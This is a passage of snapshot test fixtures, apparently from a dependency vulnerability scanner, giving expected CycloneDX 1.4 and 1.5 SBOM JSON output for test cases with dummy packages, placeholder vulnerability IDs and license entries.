"pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [], "purl": "pkg:npm/mine1" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/no_sources - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [], "purl": "pkg:npm/mine1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine3@0.10.2-rc", "type": "library", "name": "mine3", "version": "0.10.2-rc", "licenses": [], "purl": "pkg:npm/mine3@0.10.2-rc" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [], "detail": "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [], "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } }, { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "UNKNOWN" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" }, { "bom-ref": "pkg:nuget/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:nuget/mine1@1.3.5" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/multiple_sources_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/no_sources - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "UNKNOWN" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } }, { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2", "type": "library", "name": "mine2", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { 